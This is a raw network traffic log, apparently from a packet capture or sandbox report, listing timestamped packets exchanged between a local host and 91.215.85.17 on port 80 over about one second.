                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744684935 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744707108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744712114 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744720936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744745016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744767904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744771004 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744812012 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744822025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744836092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744862080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744875908 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744891882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744905949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744930983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744935989 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744945049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.744972944 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745074034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745088100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745127916 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745181084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745194912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745207071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745219946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745225906 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745259047 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745260954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745274067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745287895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745301008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745304108 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745313883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745327950 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745332003 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745357990 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745383978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745399952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745414019 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745426893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745428085 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745450974 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745479107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.745522976 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969058990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969084024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969099998 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969115973 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969131947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969146013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969160080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969161034 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969172955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969235897 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969321966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969377041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969391108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969403982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969414949 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969419956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969444036 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969445944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969485044 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969495058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969562054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969575882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969588995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969599009 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969623089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969635010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969650030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969650984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969661951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969675064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969687939 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969691992 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969701052 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969712973 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969715118 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969724894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969733953 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969752073 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969758987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969770908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969782114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969794035 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969815016 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969815969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969839096 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969851971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969875097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969877005 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969901085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969918966 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.969999075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.970014095 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.970026016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.970038891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.970046997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.970052958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.970065117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.970067978 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.970096111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.970118999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.970133066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.970155954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.970156908 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.970194101 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.970217943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.011997938 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.012041092 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.237613916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.254599094 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.266161919 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.266361952 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.491813898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.510076046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.529789925 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.529859066 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.755609035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776132107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776196957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776236057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776269913 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776276112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776319027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776328087 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776355982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776397943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776398897 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776433945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776473999 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776563883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776604891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776642084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776644945 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776680946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776720047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776722908 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776757956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776796103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776801109 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776832104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776865959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776885033 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776901007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776937008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776946068 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776973009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777009010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777015924 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777045012 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777081966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777086973 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777118921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777153969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777158976 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777189970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777224064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777230024 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777287960 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777326107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777360916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777374983 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777395964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777405024 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777435064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777472973 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777479887 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777508974 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777544975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777549982 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777580023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777615070 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777620077 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777648926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777683973 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777689934 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777723074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777762890 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777827024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777863979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777904034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777909994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777939081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777973890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.777977943 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778008938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778045893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778050900 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778083086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778119087 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778120995 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778155088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778192997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778203964 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778229952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778266907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778275013 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778304100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778338909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778348923 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778377056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778413057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778415918 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778449059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778484106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778487921 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778520107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778556108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778563976 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778592110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778628111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778633118 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778665066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778701067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778702021 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778737068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778772116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778776884 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778808117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778846025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778846979 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778881073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778917074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778919935 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778951883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778986931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.778990030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779023886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779057980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779059887 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779093981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779128075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779129982 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779162884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779197931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779200077 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779234886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779269934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779273033 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779305935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779341936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779349089 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779377937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779412031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779414892 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779448032 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779484987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779510021 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779521942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779560089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779566050 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779613972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779650927 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779660940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779685974 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779722929 CET804972091.215.85.17192.168.2.6
